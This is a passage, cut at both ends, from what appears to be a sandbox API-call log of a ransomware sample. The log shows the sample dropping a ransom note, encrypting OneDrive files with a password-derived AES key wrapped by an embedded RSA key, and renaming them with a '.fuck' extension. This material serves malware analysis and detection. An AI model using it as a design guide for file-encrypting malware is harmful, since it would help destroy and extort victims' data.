[0270.026] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.026] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0270.026] FindClose (in: hFindFile=0x2938378 | out: hFindFile=0x2938378) returned 1 [0270.026] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\readme_back_files.htm")) returned 0xffffffff [0270.026] AreFileApisANSI () returned 1 [0270.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0270.026] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0270.027] GetFileType (hFile=0x5d10) returned 0x1 [0270.027] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0270.029] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0270.029] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2fa7c8 [0270.032] FindNextFileA (in: hFindFile=0x2fa7c8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0270.033] FindNextFileA (in: hFindFile=0x2fa7c8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0270.033] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2fa788 [0270.040] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.040] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.040] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.040] GetLastError () returned 0x0 [0270.041] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png")) returned 0x20 [0270.041] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png", dwFileAttributes=0x80) returned 1 [0270.042] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.043] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.047] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.gsg", dwFileAttributes=0x2) returned 1 [0270.048] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.050] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.050] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0270.050] CryptHashData (hHash=0x2fa508, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.050] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa508, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa4c8) returned 1 [0270.050] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.050] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.051] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27a18) returned 1 [0270.051] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27a18, dwCertEncodingType=0x1, pInfo=0x2f31f50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31f80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31f88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa908) returned 1 [0270.051] CryptEncrypt (in: hKey=0x2fa908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.051] CryptEncrypt (in: hKey=0x2fa908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27908*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27908*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f27908*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27908*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.058] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0xbc, lpOverlapped=0x0) returned 1 [0270.077] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xbc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xc0) returned 1 [0270.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xc0, lpOverlapped=0x0) returned 1 [0270.077] CloseHandle (hObject=0x5d48) returned 1 [0270.077] CloseHandle (hObject=0x5d3c) returned 1 [0270.077] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png"), bFailIfExists=0) returned 1 [0270.080] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png", dwFileAttributes=0x0) returned 1 [0270.081] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png.gsg")) returned 1 [0270.082] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png.fuck")) returned 1 [0270.083] CryptDestroyHash (hHash=0x2fa508) returned 1 [0270.083] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0270.083] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.083] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.083] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.083] GetLastError () returned 0x0 [0270.084] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif")) returned 0x20 [0270.084] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif", dwFileAttributes=0x80) returned 1 [0270.085] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.086] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.087] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.gsg", dwFileAttributes=0x2) returned 1 [0270.087] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.089] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.089] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0270.089] CryptHashData (hHash=0x2fa608, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.089] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa608, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa648) returned 1 [0270.090] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.090] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.090] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27660) returned 1 [0270.090] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27660, dwCertEncodingType=0x1, pInfo=0x2f326a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f326d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f326d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa688) returned 1 [0270.090] CryptEncrypt (in: hKey=0x2fa688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.090] CryptEncrypt (in: hKey=0x2fa688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27220*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27220*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f27220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27220*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.103] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.103] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.121] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.121] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.122] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.122] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.122] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.122] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.123] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.123] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.123] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.123] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.123] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.123] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.124] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.124] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.124] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.124] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.125] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, 